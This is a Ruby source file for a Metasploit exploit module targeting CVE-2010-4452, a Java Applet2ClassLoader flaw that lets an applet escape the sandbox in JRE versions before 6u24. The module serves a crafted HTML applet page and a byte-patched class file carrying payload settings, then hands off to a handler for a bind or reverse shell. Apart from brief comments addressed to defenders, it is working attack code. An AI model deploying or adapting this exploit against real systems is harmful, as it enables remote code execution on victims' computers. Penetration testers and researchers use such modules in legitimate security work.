##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
# Metasploit module for CVE-2010-4452 (Sun Java Applet2ClassLoader).
#
# The module runs an HTTP server (HttpServer::HTML mixin) and answers each
# request with one of two responses: an HTML page holding an <applet> tag, or
# a copy of the bundled AppletX.class with two embedded strings rewritten.
#
# Notes for defenders, taken from the metadata and code below:
# * Affected software: JRE prior to version 6 update 24 ('Description'); the
#   Oracle advisory under 'References' is the vendor notice for the fix.
# * The served page carries an <applet> whose "codebase" is a "file:" URL
#   (a local, trusted directory) and whose "code" is this server's URI with
#   the host rewritten as one decimal integer, so it contains no dots.
# * The class file is sent as application/octet-stream for any request URI
#   ending in ".class".
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Declares the module metadata and registers the LIBPATH option.
  #
  # @param info [Hash] module info supplied by the caller; merged with the
  #   values below through update_info
  def initialize(info = {})
    reference_list = [
      [ 'CVE', '2010-4452' ],
      [ 'OSVDB', '71193' ],
      [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],
      [ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
      [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
    ]

    payload_spec = {
      'Space' => 20480,
      'BadChars' => '',
      'DisableNops' => true,
      'Compat' => { 'ConnectionType' => '-find' }
    }

    # OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
    # FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
    target_list = [
      [ 'Generic (Java Payload)',
        {
          'Arch' => ARCH_JAVA,
          'Platform' => 'java',
        }
      ],

      # Native payloads aren't currently supported (only work with jar/war).
      # The native target stays disabled, as in the original:
      #   [ 'Windows x86',
      #     {
      #       'Arch' => ARCH_X86,
      #       'Platform' => 'win',
      #     }
      #   ],
    ]

    super(update_info(info,
      'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution',
      # The text below is kept flush-left because %q{} preserves leading
      # whitespace verbatim.
      'Description' => %q{
This module exploits a vulnerability in the Java Runtime Environment
that allows an attacker to run an applet outside of the Java Sandbox. When
an applet is invoked with:

1. A "codebase" parameter that points at a trusted directory
2. A "code" parameter that is a URL that does not contain any dots

the applet will run outside of the sandbox.

This vulnerability affects JRE prior to version 6 update 24.
},
      'License' => MSF_LICENSE,
      'Author' => [
        'Frederic Hoguin', # Discovery, PoC
        'jduck' # Metasploit module
      ],
      'Version' => '$Revision$',
      'References' => reference_list,
      'Platform' => [ 'java' ], #, 'win' ],
      'Payload' => payload_spec,
      'Targets' => target_list,
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Feb 15 2011'
    ))

    # This is the default for a 32-bit Windows install
    default_libpath = "C:\\Program Files\\java\\jre6\\lib\\ext"

    register_options(
      [
        OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)", default_libpath ]),
      ], self.class)
  end

  # Reads the bundled AppletX.class into @java_class, then hands control to
  # the parent class's exploit method.
  #
  # @raise [RuntimeError] if the read produced no data
  def exploit
    segments = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ]
    class_file = segments.join(::File::SEPARATOR)

    # Reset first so that a failed open leaves the instance variable nil.
    @java_class = nil
    @java_class = File.open(class_file, "rb") do |io|
      io.read(io.stat.size)
    end

    raise RuntimeError, "Unable to load java class" unless @java_class

    super
  end

  # Handles one HTTP request: a URI ending in ".class" gets the rewritten
  # class file, anything else gets the HTML page with the <applet> tag.
  #
  # @param cli the client connection (peerhost and peerport are read from it)
  # @param request the HTTP request (only request.uri is read)
  def on_request_uri(cli, request)
    served_uri = get_uri(cli)

    # Do what get_uri does so that we can replace it in the string: the local
    # address is swapped for its 32-bit integer form ('N' = big-endian
    # unsigned), which gives a URL without dots.
    local_addr = Rex::Socket.source_address(cli.peerhost)
    addr_as_int = Rex::Socket.addr_aton(local_addr).unpack('N').first
    code_url = served_uri.sub(local_addr, addr_as_int.to_s)

    codebase = "file:" + datastore['LIBPATH']

    settings = "Spawn=2\nLPORT=#{datastore['LPORT']}\n"
    # The java payloads decide to be reverse if LHOST is set.
    if datastore['PAYLOAD'] =~ /reverse/
      settings << "LHOST=#{datastore['LHOST']}\n"
    end

    # Fixed offsets into AppletX.class. Each points at a 2-byte length field
    # followed by a placeholder string (8 and 7 bytes long respectively).
    config_off = 0x10e
    cn_off = 0x2f76

    case request.uri
    when /\.class$/
      # NOTE: the payload for this module is implemented in the .class file
      # directly, for two reasons:
      #   1. The file must be a single .class file
      #   2. The class inside must derive from Applet
      # As such, the traditional payload generation facilities are not used.
      # regenerate_payload is still called so that bind payloads will
      # properly connect to the client instead of using RHOST; its return
      # value is not needed.
      regenerate_payload(cli)

      print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")

      patched = @java_class.dup
      patched[config_off, 2] = [settings.length].pack('n')
      patched[config_off + 2, 8] = settings

      # The first splice changed the file length, so the second offset moves
      # by the same amount; the original length was 8 (CONFIGZZ).
      shifted_cn_off = cn_off + (settings.length - 8)
      patched[shifted_cn_off, 2] = [code_url.length].pack('n')
      patched[shifted_cn_off + 2, 7] = code_url

      send_response(cli, patched, { 'Content-Type' => "application/octet-stream" })
      handler(cli)
    else
      # The heredoc body is kept flush-left: <<- only lets the terminator be
      # indented, the body itself is sent as written.
      page = <<-EOS
<html>
<body>
<applet codebase="#{codebase}" code="#{code_url}" />
</body>
</html>
      EOS
      print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
      send_response_html(cli, page)
    end
  end
end